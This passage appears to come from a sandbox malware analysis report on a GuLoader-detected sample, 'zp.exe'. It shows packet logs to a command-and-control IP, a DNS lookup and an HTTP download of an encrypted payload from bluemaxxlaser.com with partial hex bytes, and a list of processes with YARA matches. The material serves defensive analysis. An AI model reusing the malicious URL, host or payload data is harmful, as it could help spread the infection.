                                                          Jun 1, 2023 12:31:35.231504917 CEST497562537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:31:35.231515884 CEST25374975645.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:31:35.231528044 CEST25374975645.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:31:35.231548071 CEST25374975645.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:31:35.231559038 CEST25374975645.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:31:35.231606960 CEST497562537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:31:35.231606960 CEST497562537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:31:35.231654882 CEST497562537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:31:35.231753111 CEST497562537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:31:35.231805086 CEST497562537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:31:36.034210920 CEST497562537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:31:36.034212112 CEST497562537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:31:36.137939930 CEST497562537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:31:36.144320011 CEST497562537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:31:36.156290054 CEST25374975645.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:31:36.162755013 CEST25374975645.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:06.851600885 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:06.870300055 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:06.870533943 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:06.870599985 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:06.889178038 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:06.899540901 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:06.899621964 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:06.899972916 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:06.906634092 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:06.938869953 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:06.939260960 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:06.979370117 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:06.981843948 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.041071892 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.041300058 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.060453892 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.064126968 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.066525936 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.126061916 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.126255035 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.144808054 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.146694899 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.156584024 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.156584024 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.156584024 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.156754017 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.157056093 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.157145023 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.157145023 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.175728083 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.175798893 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.175848007 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.175893068 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.176045895 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.176100016 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.176191092 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.176191092 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.176281929 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.176506996 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.194447994 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.194487095 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.194639921 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.194750071 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.194807053 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.194892883 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.194998980 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.195022106 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.195130110 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.195202112 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.195202112 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.195202112 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.195244074 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.195244074 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.195385933 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.195416927 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.195472956 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.195588112 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.195588112 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.195729971 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.195739031 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.195739031 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.196078062 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.196245909 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.213011026 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.213161945 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.213174105 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.213211060 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.213258028 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.213309050 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.213433027 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.213524103 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.213599920 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.213685989 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.213727951 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.213769913 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.213882923 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.213926077 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.213957071 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.213957071 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.213957071 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:07.214057922 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.214241982 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.214432955 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.214483023 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.214792967 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.231657028 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.232044935 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.232227087 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.232764959 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.233031034 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.233169079 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.233212948 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.233448982 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.233573914 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.233753920 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.233896971 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.235956907 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:07.285959005 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:08.238931894 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:08.298027039 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:08.298338890 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:08.316544056 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:08.325463057 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:08.325524092 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:08.325567007 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:08.325740099 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:08.325741053 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:08.325854063 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:08.325854063 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:08.325894117 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:08.326006889 CEST497572537192.168.11.2045.66.230.155
                                                          Jun 1, 2023 12:32:08.344181061 CEST25374975745.66.230.155192.168.11.20
                                                          Jun 1, 2023 12:32:08.344240904 CEST25374975745.66.230.155192.168.11.20
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jun 1, 2023 12:30:30.045893908 CEST6069653192.168.11.201.1.1.1
                                                          Jun 1, 2023 12:30:30.084867001 CEST53606961.1.1.1192.168.11.20
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jun 1, 2023 12:30:30.045893908 CEST192.168.11.201.1.1.10x9879Standard query (0)bluemaxxlaser.comA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jun 1, 2023 12:30:30.084867001 CEST1.1.1.1192.168.11.200x9879No error (0)bluemaxxlaser.com203.175.174.69A (IP address)IN (0x0001)false
                                                          • bluemaxxlaser.com
                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.11.2049754203.175.174.6980C:\Users\user\Desktop\zp.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Jun 1, 2023 12:30:30.256089926 CEST10OUTGET /rh/rh.bin HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
                                                          Host: bluemaxxlaser.com
                                                          Jun 1, 2023 12:30:30.419562101 CEST11INHTTP/1.1 200 OK
                                                          Date: Thu, 01 Jun 2023 10:30:30 GMT
                                                          Server: Apache
                                                          Last-Modified: Sun, 28 May 2023 15:42:27 GMT
                                                          Accept-Ranges: bytes
                                                          Content-Length: 454720
                                                          Content-Type: application/octet-stream
                                                          Data Raw: 0c 4c ea a4 93 e9 10 09 17 de c5 ec 53 d6 fd f0 02 17 5d 7b 44 4c 94 19 ea 9f f1 40 08 78 05 45 81 5e 09 b3 50 96 7f cf 40 20 0a 0a ad a8 0e 90 3d 9e 70 27 f6 3d fc e2 e8 28 d7 81 e6 75 5a 68 d0 49 05 b3 5a e0 bb 85 44 a2 b7 60 18 67 0f 38 07 dc d8 4e 38 4c 71 36 08 2e b2 80 18 43 20 33 99 ba 13 b0 99 3c 81 8f 60 7a a5 1c 31 48 75 76 b3 6a 0b fb 96 26 42 66 b1 07 5a dd c6 35 bc 67 e7 b9 95 53 b7 58 e2 57 31 c7 92 70 87 3b 7f eb 33 48 b2 02 a2 0f ef 6d 70 7d 41 93 49 11 45 0b 01 de 85 56 7d d4 91 f4 c1 50 df 67 5a 1f 6f d7 6f 1e 0a 59 f4 a5 86 0e 77 75 f9 18 db 6d 9d 4d 99 11 3b f9 d0 59 bb 01 f9 ff ec 09 bd e8 84 d4 5b d6 35 74 01 b8 98 b6 31 5d 07 5a 14 8d ca c2 0b a2 3a c2 c8 34 36 2c 60 97 c9 ed 9b 6d 13 bb 89 11 16 c8 aa 40 a7 d1 f8 81 c5 7c f4 2a d5 d4 12 18 31 21 18 b2 3c 04 58 59 4c 4f 4e 98 e1 18 8c fb fe 30 c6 71 2d 8d 7d c6 14 61 45 b7 aa 05 86 05 4e e6 7a 52 c9 33 fc 73 f9 3a dc e9 ed 17 74 c4 8c 1c c0 f4 d6 a2 56 64 f5 65 0d a7 35 26 d9 19 71 d7 b9 69 e5 6e 51 96 76 5f 79 f4 6f a6 af 8f c3 7b 1a 6a 5d 12 87 cd cb 6f f2 3a b5 01 9e ea 5c 35 b4 ae 09 eb ce 3b 46 22 01 68 9e f8 d3 f4 06 15 34 4d b9 85 0a 5e 8d 55 e9 4f a4 54 47 f1 b4 0d 29 5e fb a3 51 8f 96 c4 a4 17 9d 2d 2e 6f 9f 96 13 7a 08 d4 32 3e cc 3a d4 a2 dd 16 88 50 49 dc b0 68 7c 37 a1 7d 07 e7 a7 31 2e 60 62 83 c3 d1 80 27 11 82 0f d3 64 97 83 9e b1 64 78 7d 91 37 ae e1 5c 86 af f0 7c 39 24 d4 22 84 f5 45 48 f0 7d af fe 51 56 df 57 c0 d6 23 b0 79 f1 50 57 01 55 8e e7 fb 2d 20 9b 19 80 8b e1 0b dd 17 ea af 04 b8 bc aa e5 30 4f fc 2a 8c 9c 9e 29 5e e9 b8 39 48 d1 10 13 cd df c3 dc 69 31 01 59 88 1c eb f4 c0 e1 61 a3 fb 95 3e f8 86 12 b0 ca da 80 42 17 e6 18 83 f3 b4 71 6b 8e 43 7b 1d 42 be 38 77 04 c9 93 3c c5 00 1d bd 63 b0 f6 5b 81 8e d8 44 79 b6 0c 0e df ea d8 18 e1 93 df cf ce b8 d4 b0 03 98 b0 7f c1 19 f9 af ae a4 21 f4 01 fc 69 53 55 a6 1f bf a8 5b 74 8a 01 4c a6 ee 7c 64 2b 48 20 98 f8 32 c8 58 b5 f8 58 64 c9 e3 ad a2 7f ca af 24 a9 6d 62 d4 e1 05 f4 7a 53 06 eb 1b 97 f0 0a c8 f1 ac b0 18 49 ec 8a 68 a5 ad 85 1e 4e 48 69 b2 02 19 54 89 53 95 37 56 89 2c 92 ee 5f 2a 41 06 88 ac 6c 75 3f f8 6e 7e 36 85 52 f5 c4 25 ce 76 98 98 8c ae ae 17 e5 18 35 ff 63 61 69 28 dc 4f 00 37 87 c2 c9 5a 55 73 c5 ad 69 47 18 24 fd 83 5d 09 fa 2a 85 72 7e 2d 54 ae d4 ea 29 c9 1e 4d e7 a6 9b b5 78 0e cb ec b9 f6 cd 4c db a0 e9 62 1a 22 ea 92 cc 19 41 f5 e8 69 e3 de 30 8e e3 ca 0d cb 19 c2 e8 26 36 c4 89 43 58 09 50 6d 2a 00 57 b5 b9 86 82 d1 b4 ed f8 68 e9 91 29 77 5a 53 37 e0 63 9a 65 9d 60 56 f4 80 16 db 92 af e5 09 06 65 e5 f7 54 eb 29 4d 34 88 46 d3 c8 ae fd 8d 19 c9 6c 31 2b ce 53 04 d0 99 ca 0d 95 1e 49 2e b4 44 10 45 ea 9f 06 58 af 64 bf 56 24 3b c0 67 e7 fd 16 a6 ac 91 51 d2 5e b9 14 c1 55 a3 34 38 df f3 df f6 3c a0 72 4d b8 ed 3c c3 68 ba ba 68 e9 da bb 21 2f 93 bd 3f 41 9b 99 57 ac e6 80 fd 38 8b 65 a2 40 d8 1c 55 da e4 25 5b 36 46 7f 9b 84 40 20 0f fa fc b4 63 3b 28 7b 8a 5a ea 92 e7 9a 1c 7b 7a aa a6 bd e8 ca a0 2d ea 23 62 f7 31 9f 4d 87 52 21 2c 1c b2 df f9 08 c0 5e bc 73 84 17 b8 1a 2a 30 5e 5e 50 28 7a 01 31 2d 6f 1c fe ea 98 cd b0 6b 17 0f 06 71 18 03 22 55 11 3f 7a fe 9d a5 73 ef 2d 09 54 47 56 6d c2 12 52 db 33 b1 30 11 d8 d0 88 d8 b0 02 94 62 e7 fe 52 38 ff 26 a2 4f ad fb 2e 2a e1 b6 1d b4 c6 c3 0f 05 83 1d 41 aa da
                                                          Data Ascii: LS]{DL@xE^P@ =p'=(uZhIZD`g8N8Lq6.C 3<`z1Huvj&BfZ5gSXW1p;3Hmp}AIEV}PgZooYwumM;Y[5t1]Z:46,`m@|*1!<XYLON0q-}aENzR3s:tVde5&qinQv_yo{j]o:\5;F"h4M^UOTG)^Q-.oz2>:PIh|7}1.`b'ddx}7\|9$"EH}QVW#yPWU- 0O*)^9Hi1Ya>BqkC{B8w<c[Dy!iSU[tL|d+H 2XXd$mbzSIhNHiTS7V,_*Alu?n~6R%v5cai(O7ZUsiG$]*r~-T)MxLb"Ai0&6CXPm*Wh)wZS7ce`VeT)M4Fl1+SI.DEXdV$;gQ^U48<rM<hh!/?AW8e@U%[6F@ c;({Z{z-#b1MR!,^s*0^^P(z1-okq"U?zs-TGVmR30bR8&O.*A
                                                          Jun 1, 2023 12:30:30.419682980 CEST13INData Raw: 59 3e 8a 10 e2 11 2e 56 9a c7 7d 6b 1c 5c 60 d2 71 60 98 50 e6 23 1b aa 27 2f db 52 e0 53 e3 57 40 30 a7 31 5d 24 da 55 7c 42 6c 66 b3 ec 3e 4e c4 01 41 dd 2e 0f 48 fa 0a c3 79 ae d9 8b 4d df 0a 4e 5d 3f e2 ed 3c 0e b3 6d 27 bc 1a c4 27 62 96 28
                                                          Data Ascii: Y>.V}k\`q`P#'/RSW@01]$U|Blf>NA.HyMN]?<m''b(}RFl?k*#g;`!_" 3~p!]Xzl@LUZvx*7V/v3+5?m;dxv<?-v):VRo;q
                                                          Jun 1, 2023 12:30:30.419759035 CEST14INData Raw: 86 af 10 7a 39 fc dc 22 84 f5 45 48 f0 7d af fe 51 56 df 57 c0 d6 23 b0 79 f1 50 57 01 55 8e e7 fb 2d 20 9b 19 80 8b e1 0b dd 17 ea af 04 b8 bc aa e5 30 4f fc 2a 8c 9c 9e 29 ee e8 b8 41 4b d1 10 13 cd df c3 dc 69 31 01 59 88 1c eb f4 c0 e1 61 a3
                                                          Data Ascii: z9"EH}QVW#yPWU- 0O*)AKi1Ya>:c/pkS{B9w<c[DYny( iSU[tALRJ<A2\LXmbzSJlj,INHiRTS7,_*Alu
                                                          Jun 1, 2023 12:30:30.419832945 CEST15INData Raw: 4f 2e d5 a4 da 47 f2 16 32 11 bc 31 4a d3 22 6e 51 ff f7 56 49 99 f2 ba 86 39 ea 6b da dc d1 7c ab ac b2 83 55 e1 b1 b7 40 a5 29 a0 71 04 41 47 f6 2b 8a b5 f5 26 8d 69 76 97 68 ca a6 23 c7 7f e7 1f fc 37 af 77 0c 21 ad 4b 55 e0 ba 4f 12 80 2c 29
                                                          Data Ascii: O.G21J"nQVI9k|U@)qAG+&ivh#7w!KUO,)ZY*eze=*Mpq"1q^H0*xDC"vRPt>Q!\Z*e3U4;0iWw9M7cvp!-XjA*m>pxY
                                                          Jun 1, 2023 12:30:30.419912100 CEST17INData Raw: 86 4c 49 da d4 af 9d 4d f7 37 90 ed cc fc 15 8f ff f1 3d df a5 ff 1e f9 f3 94 86 db d1 63 3f ef 0b 4e de fb ee 06 f8 5d 4c 1b 37 43 6c c8 cf 1f 8f 28 e6 fe 96 4a 56 38 63 74 e4 6c c0 4b e0 5e 0e 21 41 10 43 b7 25 1b 10 dc 1c 2d 34 53 dc c0 d3 5e
                                                          Data Ascii: LIM7=c?N]L7Cl(JV8ctlK^!AC%-4S^F){YI9g<R,Z\!/d/vD6 Sv}6O]5;*&Lcli6?m7fcrb?yrp?&GwoZ77/<gJXbC\byP
                                                          Jun 1, 2023 12:30:30.419985056 CEST18INData Raw: 8d 35 df 48 94 0e 57 e1 0b dd 2c e3 db 34 33 3a 4a e5 30 4f 17 21 07 c9 66 10 be e0 cc 48 c0 91 14 28 0c aa 32 37 7e ba 49 5d 03 0c 62 e5 4b e9 ea f3 ff c5 54 f8 0f 43 b4 1b d8 fd c5 b0 8e 65 57 92 64 fd ed 2e 53 7b 1d 28 1e 69 9f 2e c4 93 3c 46
                                                          Data Ascii: 5HW,43:J0O!fH(27~I]bKTCeWd.S{(i.<F8<?E4"=0&DwZ@--]BXTtRx$+&f\k,S&iE6LwHj^*A3/q&wr'F<6P
                                                          Jun 1, 2023 12:30:30.420130014 CEST19INData Raw: ab 47 a2 44 13 e9 4a af 00 a5 c2 f0 b6 42 49 bc ee 6b 8a 3c 9b 12 4a 2f 7a 7f 6b ca a6 c8 83 28 6e 71 c8 df 14 8c f3 de fa 8c 13 d4 bb 4f 12 80 eb 6f 62 4b 17 1e 01 17 fe e1 73 d5 ee 57 17 f9 0f a7 ec 3d 23 f1 2e 14 b0 fd a9 86 f8 c4 2a 3f ba fe
                                                          Data Ascii: GDJBIk<J/zk(nqOobKsW=#.*?X[0q^68k|S{@&M8*cex^`8x{O9un[%8)nu'*g1XsfA{l&m,[9p/6H+dl~Q,ph{9lE;w
                                                          Jun 1, 2023 12:30:30.420208931 CEST21INData Raw: bf 0f 5d 61 15 35 27 ce 44 bd 04 f9 ee 0d e4 37 1d c4 b7 2b 61 b0 e0 38 5f 23 f4 a6 97 0f 2a 18 70 f6 0b 17 aa 04 6b 97 8b da 82 ae 6d 2c 53 aa 44 65 57 0b 9d ca a7 28 34 6f 6e 2f 80 3d 8f c4 9c 0f 20 10 01 7f c3 2c 3c f3 5f 95 77 a1 1a 94 c8 b7
                                                          Data Ascii: ]a5'D7+a8_#*pkm,SDeW(4on/= ,<_w.W/dPFZr/?.;`CI+#166zdgwLSF!`?(*p"sM>lh&?g8D\DMug"a6#D=[qjdhP)m27X
                                                          Jun 1, 2023 12:30:30.420281887 CEST22INData Raw: 64 1f a5 df 43 dc 69 5b 01 a6 fe 0c 14 24 96 8b 61 5c ee 19 8c b9 86 42 4f f1 2a 57 7b 63 47 38 4f b9 2f 4b ac fb c7 24 46 1c d7 fa 1f 4c 6c d2 3c 3a 15 59 0f 22 b0 9e 23 32 cf d8 bb 2d 92 1c 86 55 65 43 86 cc ab ec 0f c6 a6 d1 4f 26 34 01 3e c1
                                                          Data Ascii: dCi[$a\BO*W{cG8O/K$FLl<:Y"#2-UeCO&4>sU $UY:tudTRoyX[;5,b+=E;S'J7/+,Ikq7y#_d8lt?68wud=cL@lxUyHVlTQn+
                                                          Jun 1, 2023 12:30:30.420358896 CEST23INData Raw: 18 9c 3b 33 26 74 37 1c e1 87 13 e0 c6 a9 aa b8 e0 6f 5a 20 15 2d c1 a0 04 41 4f 7c ee 65 37 72 98 90 9a 04 d6 93 5e 44 2e 36 d1 86 71 8c 22 13 bd 7d de 14 23 0c 76 81 e6 cf aa 07 81 f8 fd 47 b2 b5 52 c1 e4 d0 34 76 07 11 bf 30 12 15 42 d7 72 2c
                                                          Data Ascii: ;3&t7oZ -AO|e7r^D.6q"}#vGR4v0Br,LNxEz,@51nd^i_;16|4Pw1%O9n5c&kHZ?KtQyf[7[uX^rCCX?~p6zb3ig&6Cy
                                                          Jun 1, 2023 12:30:30.580611944 CEST25INData Raw: 8d e1 79 12 02 07 6d be 4e cf 0a c0 99 53 55 a6 3d 3a ec 38 bf 13 21 ed 21 d4 5f da 03 c0 0f 30 d9 7b 42 1c 81 b0 29 2f f7 35 49 98 86 fb 22 d1 c4 4f 4a 55 63 80 cc 75 ee 74 bd f2 b3 dc f7 af 64 4b 36 ef 04 a1 09 b5 fb 2e 38 bc 96 bc 13 b9 a8 67
                                                          Data Ascii: ymNSU=:8!!_0{B)/5I"OJUcutdK6.8gi}zE%2z_EDbI]ny]p?Dw;rw#*x7{Z+9S:_X69TIPkV[uZTtmz`=fE'Obt5$qyV'Rh*3*


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:12:29:03
                                                          Start date:01/06/2023
                                                          Path:C:\Users\user\Desktop\zp.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\zp.exe
                                                          Imagebase:0x400000
                                                          File size:535909 bytes
                                                          MD5 hash:849ACB6881494898FF4A18A4A0FBDB43
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.5790793651.0000000006DAD000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          Target ID:2
                                                          Start time:12:30:20
                                                          Start date:01/06/2023
                                                          Path:C:\Users\user\Desktop\zp.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\zp.exe
                                                          Imagebase:0x400000
                                                          File size:535909 bytes
                                                          MD5 hash:849ACB6881494898FF4A18A4A0FBDB43
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000003.6285988556.00000000000D2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          Target ID:5
                                                          Start time:12:31:31
                                                          Start date:01/06/2023
                                                          Path:C:\Windows\System32\certreq.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\certreq.exe
                                                          Imagebase:0x7ff7e0440000
                                                          File size:564224 bytes
                                                          MD5 hash:9E5EA30E8DF2A24833FDB9F2D673C41A
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low

                                                          Target ID:6
                                                          Start time:12:31:32
                                                          Start date:01/06/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff792a60000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:9
                                                          Start time:12:31:36
                                                          Start date:01/06/2023
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7940 -s 1468
                                                          Imagebase:0xbd0000
                                                          File size:482640 bytes
                                                          MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:18.7%
                                                            Dynamic/Decrypted Code Coverage:15.4%
                                                            Signature Coverage:18.6%
                                                            Total number of Nodes:1489
                                                            Total number of Limit Nodes:40
